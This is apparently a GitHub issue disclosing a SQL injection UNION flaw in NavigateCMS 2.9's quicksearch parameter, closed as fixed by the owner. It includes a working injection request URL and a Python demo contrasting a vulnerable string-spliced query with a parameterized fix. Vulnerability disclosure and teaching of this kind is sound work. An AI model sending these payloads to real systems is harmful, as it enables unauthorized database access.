
SQL injection UNION attack with quicksearch parameter in NavigateCMS 2.9 #25

Closed
hydrasky-team opened this issue Jun 26, 2021 · 1 comment

@hydrasky-team

EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with the quicksearch parameter in the URL.

IMPACT
A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

VULNERABILITY CODE
I found that the quicksearch parameter is not handled in the SQL query with the WHERE clause in \lib\packages\comments\comments.php

[image]

And the protect function in \lib\core\core.php does not use ESCAPE to filter special characters

[image]

Then it is used to query in: \lib\core\database.class.php

[image]

STEPS TO REPRODUCE

  1. We change the request in URL

GET /navigate/navigate/navigate.php?fid=comments&act=json&_search=true&quicksearch=%25")+UNION+ALL+SELECT+DATABASE(),null,null,null,null,null,null,VERSION()%3b--&_search=false&nd=1623493056682&rows=30&page=1&sidx=date_created&sord=desc&filters=

  2. And then we could exploit all the data.

[image]
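Added illustration of the bug class (not NavigateCMS code): a quicksearch that splices the term into the WHERE clause beside a parameterized one, using Python and an in-memory SQLite table whose schema is a constructed stand-in. The payload is a single-quote analogue of the one in the report and, like it, only selects version constants; the ESCAPE clause shows the separate concern of literal `%`/`_` matching.

```python
import sqlite3

# Constructed analogue of the reported payload: closes the quote and the
# parenthesis, appends a UNION, and comments out the rest of the statement.
PAYLOAD = "%') UNION ALL SELECT 'injected', sqlite_version(), NULL --"

def make_db():
    # In-memory stand-in for a comments table; column names are assumptions,
    # not the real NavigateCMS schema.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE comments (id INTEGER, message TEXT, date_created TEXT)")
    con.executemany("INSERT INTO comments VALUES (?, ?, ?)", [
        (1, "hello world", "2021-06-01"),
        (2, "nice site", "2021-06-02"),
        (3, "100% sure", "2021-06-03"),
    ])
    return con

def quicksearch_vulnerable(con, term):
    # Vulnerable pattern: the search term is spliced into the WHERE clause as
    # text, so input that closes the quote and parenthesis can append a UNION.
    sql = ("SELECT id, message, date_created FROM comments "
           "WHERE (message LIKE '%" + term + "%')")
    return con.execute(sql).fetchall()

def escape_like(term):
    # Escape LIKE metacharacters so a user-typed '%' or '_' matches literally.
    # This is a separate concern from injection and no substitute for binding.
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def quicksearch_safe(con, term):
    # Hardened form: bind the term as a parameter; the driver passes it as
    # data, so quotes and keywords inside it can never alter the statement.
    sql = ("SELECT id, message, date_created FROM comments "
           "WHERE (message LIKE ? ESCAPE '\\')")
    return con.execute(sql, ("%" + escape_like(term) + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(quicksearch_vulnerable(db, PAYLOAD))  # three real rows plus an injected one
    print(quicksearch_safe(db, PAYLOAD))        # [] because the payload is matched as text
```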

@NavigateCMS
Owner

Fixed by b2937f5

Thank you very much @hydrasky-team
